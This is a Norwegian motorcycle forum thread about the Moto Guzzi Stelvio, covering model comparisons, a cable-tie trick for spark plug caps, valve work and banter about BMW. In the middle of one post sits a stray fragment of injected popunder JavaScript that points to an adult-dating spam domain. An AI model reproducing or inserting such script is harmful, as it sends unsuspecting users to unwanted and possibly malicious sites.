Moto Guzzi NTX/8v 1200 Stelvio

Forum for fulleffekt tung-MC
Svar
ArcticTiger
Innlegg: 3962
Registrert: 04 nov 2010, 00:10
Motorsykkelen din: x

Re: Moto Guzzi NTX/8v 1200 Stelvio

Legg inn av ArcticTiger »

AJ skrev:
ZZR-Tom skrev:Første som slo meg no eg såg bildet av NTX750 var KTM Adventure :-k
Første som slo meg var den første Super Ténéré'en - 750'en - til Yamaha...
Det var vel på den tida på -90 tallet at "adventure-bike" segmentet ble et begrep? Inspirert av bla.a Paris-Dakar rallyet. Mange merker (i tillegg til ovenstående) hadde sånne sykkler: Honda Africa Twin, Triumph Tiger 900, Cagiva Elefant 750/900, Suzuki DR, BMW GS og sikkert flere :D Tøffe sykkler med gode kjøreegenskaper :thumleft

Edit:
And for your pure viewing pleasure, the 1998 Triumph Tiger 900 in British Racing Green :mrgreen :
Bilde

Brukeravatar
ojda
Innlegg: 5632
Registrert: 19 sep 2010, 02:06
Motorsykkelen din: TRIUMPH TIGER EXPLORER 1200.
Sted: Oslo

Re: Moto Guzzi NTX/8v 1200 Stelvio

Legg inn av ojda »

Hvær gang jeg ser detta bildet minnes jeg på at det er ikke
så greit der Nordpå :sorry Ikke mye sol å spore der
i løpet av sessongen :vs
Kjørt i 2014: 24323km. (v-68752) På`n igjen :-)
Kjørt i 2013:25179km. Kjørt til 21/9. Å dett var dett :-(
Kjørt i 2012:19250km D æ mer morro med ny sykkel ;-))
Kjørt i 2011:..9000km


Sendt fra min I-Pad. Nyladet med brunt skinnetui![/size]

Brukeravatar
AJ
Administrator
Innlegg: 37878
Registrert: 30 sep 2006, 18:46
Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
Sted: Lunner på Hadeland
Kontakt:

Re: Moto Guzzi NTX/8v 1200 Stelvio

Legg inn av AJ »

Artig med video'er som denne, som viser hvor begeistret testkjørerne er over syklene de får prøvd seg på :D :

[video]http://www.youtube.com/watch?v=d3nmHWlbhUE[/video]

Tro jammen jeg må få testa ut den ny V7'ern til våren, gitt :prop:
Heftig Stelvio-kjøring på grusveien, for øvrig :-)
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.

MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering Bilde

Brukeravatar
AJ
Administrator
Innlegg: 37878
Registrert: 30 sep 2006, 18:46
Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
Sted: Lunner på Hadeland
Kontakt:

Re: Moto Guzzi NTX/8v 1200 Stelvio

Legg inn av AJ »

Lurt og nyttig tips til oss som har Guzzi med den nye 8-ventilers motoren.

Å få løs pluggledning/plugghette uten at hetta skades har vist seg å være en PITA jobb på disse motorene... For å unngå skader er dette visstnok en ypperlig måte å gå fram på:
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}

Enkelt og greit en strips og vips! er plugghetta løsnet uten problem :thumleft

Og når er man nødt til å få løs pluggledningen?
Når pluggene skal byttes, selvfølgelig...
Men kanskje også lurt å skru dem ut når ventilene skal justeres også?
Den jobben er visst veldig lett på disse motorene :prf
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.

MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering Bilde

Brukeravatar
Kjellrf
Innlegg: 1597
Registrert: 31 aug 2009, 15:15
Motorsykkelen din: Kawa, Honda og Guzzi
Sted: Sandefjord

Re: Moto Guzzi NTX/8v 1200 Stelvio

Legg inn av Kjellrf »

På eldre Guzzier er det lurt å ta med ei ekstra plugghette og plugg, ramler sykkelen omkull, er plugghetta omtrent lengst ut...
Medlem av Tønsberg mc klubb
Eier: Z1000A2, CX500, V7 Sport, ZZR600 E6
Har kjørt og eid mc siden 1980.

joo
Innlegg: 1334
Registrert: 26 okt 2011, 19:25
Motorsykkelen din: '

Re: Moto Guzzi NTX/8v 1200 Stelvio

Legg inn av joo »

AJ skrev:
Å få løs pluggledning/plugghette uten at hetta skades har vist seg å være en PITA jobb på disse motorene... For å unngå skader er dette visstnok en ypperlig måte å gå fram på:
Enkelt og greit en strips og vips! er plugghetta løsnet uten problem :thumleft

Og når er man nødt til å få løs pluggledningen?
Når pluggene skal byttes, selvfølgelig...
Men kanskje også lurt å skru dem ut når ventilene skal justeres også?
Den jobben er visst veldig lett på disse motorene :prf
Eneste problemet jeg har møtt så langt når jeg mekker boxermotorer. Men har kjøpt spesialverktøy for å få grep på sakene når dem skal ut. Der er jo coil en del av hetta.
Men det stripsknepet kan være smart å notere seg ja :thumleft

Er nok et must å ta ut plugger for ventiljustering... Skal straks ned i mekkebua og nettopp justere ventiler på et par sykler, smålei av julemusikk og mat.
Men do not quit playing because they grow old,
they grow old because they quit playing...

Brukeravatar
AJ
Administrator
Innlegg: 37878
Registrert: 30 sep 2006, 18:46
Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
Sted: Lunner på Hadeland
Kontakt:

Re: Moto Guzzi NTX/8v 1200 Stelvio

Legg inn av AJ »

Om man har gjort et rett sykkelvalg vet man som regel ikke før etter noe tid.
Når et valg er gjort har man samtidig valgt bort noe.
Som denne karen gjorde. Om det er det beste valget i segmentet sies det ingeting om, men den nye Stelvio eieren virker i hvert fall veldig godt fornøyd:

http://advrider.com/forums/showthread.p ... st20331882" onclick="window.open(this.href);return false;

Gøy å lese entusiastiske brukertester som dette :thumleft
Så får man håpe at eieren blir like fornøyd med Guzzi'en som BMW'en med 47K km (miles?) på telleren...
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.

MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering Bilde

Brukeravatar
AJ
Administrator
Innlegg: 37878
Registrert: 30 sep 2006, 18:46
Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
Sted: Lunner på Hadeland
Kontakt:

Re: Moto Guzzi NTX/8v 1200 Stelvio

Legg inn av AJ »

Sitat fra en post i en annen tråd:
L-NA skrev:Selv drømmer jeg om en Stelvio med nye 1400ccm til Moto Guzzi. Bruker jeg sunn fornuft, håper jeg den aldri blir en realitet. Lar jeg "guttungen i Mannen" bestemme, ja så setter jeg meg på vente liste i morgen. :-)

Klatre i motbakker, og kjenne dunkingen i sykkelen av twin motoren og dreiemoment dra sykkelen ut av svingene og oppover bratte bakker...det er min greie..."bare må ha det" :-)
Hadde vært fascinerende med en 1400 kubikker Stelvio, ja.
Men egentlig tror jeg det hadde holdt om italienerne tok seg selv i nakken og bestemte seg for å øke kubikken på den eksisterende 1151 kubikkeren til f.eks. 1187 eller 1199 ved f.eks. å øke boringen på 95 mm til drøye 96.
Om dette er mulig uten at det kompromitterer faktorer som kjøling, størrelsen på sylinder med kjøleribber, dreiemoment- og effekt osv. osv., vet jeg ingenting om. Men jeg tror en slik modifisering ville vært mer enn nok og trolig gitt det lille ekstra med effekt som i hvert fall flere testkjørere har nevnt i sine anmeldelser...
Når det er nevnt tror jeg for øvrig tror jeg at de fleste av oss som kjører Stelvio opplever at den er sterk nok som den er ;-)

Edit:
Mer presise utregninger enn mine på "gamlemåten", ser det ut til på denne siden... :-k :

http://library.thinkquest.org/C006011/e ... m.php3?v=2" onclick="window.open(this.href);return false;
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.

MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering Bilde

Brukeravatar
L-NA
Innlegg: 813
Registrert: 02 okt 2012, 01:12
Motorsykkelen din: Moto Guzzi 1200 Stelvio NTX -2014

Re: Moto Guzzi NTX/8v 1200 Stelvio

Legg inn av L-NA »

Jeg har lest en del her på Forumet i tråden om nye GS'n, og er nesten imponert over all historisk kunnskap som kommer frem om denne sykkelen, og da kanskje mest om problemene, og hvordan BMW har taklet, reparert og utbedret disse. I den forbindelse lurer jeg på om noen har tilsvarende kunnskap om Stelvio'n når det gjelder kjente feil, mangler etc. Selvfølgelig er denne sykkelen bare barnet i forhold til GS'n - hva solgte eksemplarer, historie og tilbakelagte Km angår, men likevel :-k ??

joo
Innlegg: 1334
Registrert: 26 okt 2011, 19:25
Motorsykkelen din: '

Re: Moto Guzzi NTX/8v 1200 Stelvio

Legg inn av joo »

Nja, har ikke Guzziene sitt opphav fra BMW da?

Bilde
Men do not quit playing because they grow old,
they grow old because they quit playing...

Brukeravatar
L-NA
Innlegg: 813
Registrert: 02 okt 2012, 01:12
Motorsykkelen din: Moto Guzzi 1200 Stelvio NTX -2014

Re: Moto Guzzi NTX/8v 1200 Stelvio

Legg inn av L-NA »

joo skrev:Nja, har ikke Guzziene sitt opphav fra BMW da?

Bilde
:lol :lol
Drit bra, men nå må du ikke gå i garasjen å begynne å velte på BMW'n din, den blir dessverre ikke som like bra som Guzzi'n likevel. BMW'n er å blir en vits vet du.. :lol :lol :lol

joo
Innlegg: 1334
Registrert: 26 okt 2011, 19:25
Motorsykkelen din: '

Re: Moto Guzzi NTX/8v 1200 Stelvio

Legg inn av joo »

L-NA skrev: Drit bra, men nå må du ikke gå i garasjen å begynne å velte på BMW'n din, den blir dessverre ikke som like bra som Guzzi'n likevel. BMW'n er å blir en vits vet du..
:thumleft Hadde ikke ventet et så sviende svar :lol :rofl:
Men do not quit playing because they grow old,
they grow old because they quit playing...

Brukeravatar
L-NA
Innlegg: 813
Registrert: 02 okt 2012, 01:12
Motorsykkelen din: Moto Guzzi 1200 Stelvio NTX -2014

Re: Moto Guzzi NTX/8v 1200 Stelvio

Legg inn av L-NA »

joo skrev:
L-NA skrev: Drit bra, men nå må du ikke gå i garasjen å begynne å velte på BMW'n din, den blir dessverre ikke som like bra som Guzzi'n likevel. BMW'n er å blir en vits vet du..
:thumleft Hadde ikke ventet et så sviende svar :lol :rofl:
Unskyld då :redface ...klarte berre ikke dy meg :-)

Brukeravatar
omaas
Innlegg: 551
Registrert: 17 mar 2012, 12:20
Motorsykkelen din: Moto Guzzi Stelvio 1200 8V 2011
Sted: Melhus

Re: Moto Guzzi NTX/8v 1200 Stelvio

Legg inn av omaas »

Orginalen sier vell det meste: :vs

Bilde
Moto Guzzi Stelvio 8V 2011
Honda NTV 650 Revere 1991

Brukeravatar
guzzi Trøndelag
Innlegg: 41
Registrert: 19 jul 2012, 23:48
Motorsykkelen din: Moto Guzzi Stelvio NTX 2015 mod.
Sted: Røra, Inderøy kommune

Re: Moto Guzzi NTX/8v 1200 Stelvio

Legg inn av guzzi Trøndelag »

Her er den Engelske versjonen :prf

Bilde
2015 Moto Guzzi Stelvio NTX 1200
2015 Moto Guzzi Norge GT 8V 1200
1977 Moto Guzzi 850 T3 California

Svar